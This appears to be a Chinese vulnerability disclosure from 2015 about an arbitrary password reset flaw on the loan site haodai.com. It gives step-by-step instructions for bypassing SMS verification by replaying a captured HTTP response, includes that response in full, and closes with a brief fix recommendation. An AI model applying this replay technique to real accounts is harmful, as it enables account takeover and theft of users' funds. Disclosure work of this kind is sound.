好贷网作为一个经融网站,号称是中国最大的贷款搜索和服务平台,存在重置任意密码漏洞,影响整个系统所有用户账户资金安全,请重视!
1、本次测试发现使用手机号码找回密码处存在设计缺陷,在找回密码第二步(信息确认)时可绕过短信码校验。
2、首先使用已知手机号码进行一次正常的找回密码流程,记录第二步(信息确认)时返回的响应包,如下:
HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Mar 2015 13:54:21 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private X-Powered-By: ThinkPHP Content-Length: 6613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>好贷网 - 找回密码</title> <link rel="stylesheet" type="text/css" href="/src/c/password/base.css"/> <link rel="stylesheet" type="text/css" href="/src/c/password/findpwd1.css"/> <script type="text/javascript" src="/src/j/jquery-1.8.0.min.js"></script> <script type="text/javascript" src="/src/j/common.js"></script> <script src="/src/j/home/login_findpwd.js?v=1503102154" type="text/javascript"></script> </head> <body> <div class="re_header"> <div class="head_top auto"> <div class="head_left fl"> <li><a href="http://www.haodai.com" >好贷首页</a></li> <li><a href="http://www.haodai.com/xiaofei/" >消费贷款</a></li> <li><a href="http://www.haodai.com/qiye/">企业贷款</a></li> <li><a href="http://www.haodai.com/gouche/" >购车贷款</a></li> <li><a href="http://www.haodai.com/goufang/" >购房贷款</a></li> <li><a href="http://www.haodai.com/zixun/" >贷款资讯</a></li> <li><a href="http://www.haodai.com/wenda/">贷款问答</a></li> <div class="clear"></div> </div> <div class="head_right fr">好贷网,好贷款! 客服热线:<strong>400-8055-855</strong></div> <div class="clear"></div> </div> </div> <div class="re_main"> <div class="top clearfix wrap"> <a class="left mr" href="http://www.haodai.com"><img src="/src/i/logo.png" width="88" height="82" /></a> <div class="left mima"> <!-- <span class="zhoahui">信贷员找回密码</span><br /> <span class="find">Find Password</span>--> <span><a class="left mr" href="http://www.haodai.com/ajax/getpasswd"><img src="/../src/i/wenda/zhaohui.jpg" width="199" height="67" /></a></span> </div> </div> <div class="mainr"> <div class="mat01"> <div class="mat01_left"></div> <div class="mar01_center"> <!--找回密码第一步--> <div class="box clearfix wrapper"> <ul class="box-ul clearfix"> <li class="one-mo left"><a class="current">1.输入登录名</a></li> <li class="two-que-que left"><a class="current">2.信息确认</a></li> <li class="three-chong-zhi left"><a class="current">3.重置密码</a></li> <li class="four-gai left"><a>4.密码修改成功</a></li> </ul> <form class="clearfix findpwd3" action="/ajax/getpasswd/act/success" method="post" onsubmit="return czmm();"> <div class="clearfix"> <div class="left"> <label>输入新密码:</label><br /> <input id="pwdid" name="pwd" type="password" class="text1" value="" onfocus="pdmm(this, 'retImgpwd1');" onblur="pdmm(this, 'retImgpwd1');"/> </div> <div id="retImgpwd1" class="left"></div><br/> </div> <div class="clearfix"> <div class="left"> <label>确认新密码:</label><br /> <input id="pwdid1" name="pwd1" type="password" class="text2" value="" onfocus="pdmm(this, 'retImgpwd2');" onblur="pdmm(this, 'retImgpwd2');"/> </div> <div id="retImgpwd2" class="left"></div><br /> </div> <input type="submit" class="button" value="提交" /> </form> </div> <!--密码修改成功第四步--> </div> <div class="mat01_right"></div> <div class="clear"></div> </div> </div> </div> <div class="bottom wide"> <!--信贷员底部图--> <div class="bottom" style="height: 1px;border-top: 1px solid #d0d0d0;width:100%"> <div class="foot"> <p class="footp1">好贷网一站式贷款搜索平台,免费为您提供各大银行、小贷公司、典当行的正规贷款,各类个人贷款、个人信用贷款、个人抵押贷款、企业信用贷款、企业抵押贷款任你选。</p> <p class="footp2"> <a href="http://www.haodai.com/wenzhang/about/cate_id/1" target="_blank" rel="nofollow">关于好贷</a> <span>|</span> <a href="http://www.haodai.com/xdy/login/register" target="_blank" rel="nofollow">信贷员免费注册</a> <span>|</span> <a id="footer_calc" href='http://www.haodai.com/calc/' target="_blank">贷款计算器</a><span>|</span> <a href="http://www.haodai.com/wenzhang/about/cate_id/6" target="_blank" rel="nofollow">网站使用条款与声明</a><span>|</span> <a href="http://www.haodai.com/map/" target="_blank">网站地图</a><span>|</span> <a href="http://www.haodai.com/wenzhang/about/cate_id/2" target="_blank" rel="nofollow">联系我们</a> </p> <p class="footp3">Copyright © 2012-2014 haodai.com All Rights Reserved. 京ICP备11015456号-5 京ICP证110311号 京公网安备11010102001350号</p> <p class="footplink"> <a id='___szfw_logo___' rel="nofollow" class="bottomIcon cxwz" href='https://search.szfw.org/cert/l/CX20140723008871008561' target='_blank'></a> <script type='text/javascript'>(function(){document.getElementById('___szfw_logo___').oncontextmenu = function(){return false;}})();</script> </p> </div> </div> </div> </body> </html>
3、再做一次找回密码操作,如下图,输入手机号与图验后下发短信验证码
4、在第二步中输入任意短信码(此处为123456),可以看到返回的响应提示短信码错误
5、用第一次重置密码操作得到的响应包替代此处,如下
6、释放请求后,进入重置密码页面,重置密码为333eee
7、重置密码成功,可利用该密码成功登录系统
漏洞修复办法:完善认证机制,在前端和服务端同时校验